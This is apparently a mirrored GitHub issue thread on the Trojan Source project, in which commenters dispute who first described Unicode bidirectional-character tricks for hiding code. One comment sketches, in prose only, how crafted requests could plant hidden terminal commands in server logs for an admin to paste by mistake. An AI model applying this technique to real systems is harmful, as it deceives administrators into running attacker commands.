Comments (9)
I believe the correct thing to do is to rephrase your paper as a variation of the above attack. Given that my attack was published 5 years ago, it seems dishonest of you to claim ownership of the idea.
from trojan-source.
Just to add to this, I'm aware of quite a few examples in prior work, but not sure who originated the idea however. Goes back to 2011 at least, but wouldn't be surprised if it went back even further.
"Bug 339146 - [BiDi] Misleading display of bidirectional strings when RLO, LRO or PDF is used" (2011) by im3w1l is the earliest reference I found.
I think the main issue is the paper heavily implies you came up with the idea of using unicode tricks to backdoor code (e.g first sentence of the abstract), but that is clearly not true.
Edit: Seems Eclipse set the bug as private. I'd presume that's because people started commenting / contacting people involved in a decade old issue. Please don't do that, you aren't helping.
from trojan-source.
FYI, the attack I linked above used string literals as the container for the attack payload, but they modified the structure of the program, the same way that your early return
or commenting out
idea does. Your described attacks are nothing more than slight variations to program structure modifications that my attack already did.
from trojan-source.
Thank you for sharing this link!
We will leave this comment here on GitHub for reference to include with the history of this technique.
The attacks proposed in Trojan Source represent a much larger attack surface than string literals in Go, which as of the time of publication are still vulnerable in our tests. The commenting-out
and early return
techniques described in the paper also represent novel attack vectors.
from trojan-source.
Yea I've heard of this years ago as well lmao
from trojan-source.
I confirm that I heard of similar attacks 10 years ago.
There can also be attacks through server logs. With special crafted requests, you can for example generate Apache or Nginx logs where you can hide commands "underneath" the IP. So if an admin tries to copy/paste the IP in a terminal, for example for a whois, you can run commands.
from trojan-source.
@JohnXLivingston lmao that's a good one
from trojan-source.
I confirm that I heard of similar attacks 10 years ago. There can also be attacks through server logs. With special crafted requests, you can for example generate Apache or Nginx logs where you can hide commands "underneath" the IP. So if an admin tries to copy/paste the IP in a terminal, for example for a whois, you can run commands.
whoa. how?
from trojan-source.
whoa. how?
Same technique: you use unicode special characters to change the write direction (for example in your user agent).
from trojan-source.
Related Issues (12)
- Python3 returns syntax error: HOT 1
- Does an homoglyphe function concerned by Trojan source? HOT 1
- Could we help developers detect and prevent issues of trojan source in their projects? HOT 8
- invisible-function.c and homoglyph-function.c cant be build with gcc <= 9.1, but successful with gcc 11.2
- Doubt regarding early-return.py example HOT 4
- Tools to detect possible attacks HOT 1
- āļ
- That's poor editor attack vector not compiler/code/interpreter HOT 2
- Provide an example of propper use for reference HOT 1
- Early return and comment out in languages without closing comment token? HOT 2
- Variations on Stretched String HOT 4
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
đ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. đđđ
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google â¤ī¸ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from trojan-source.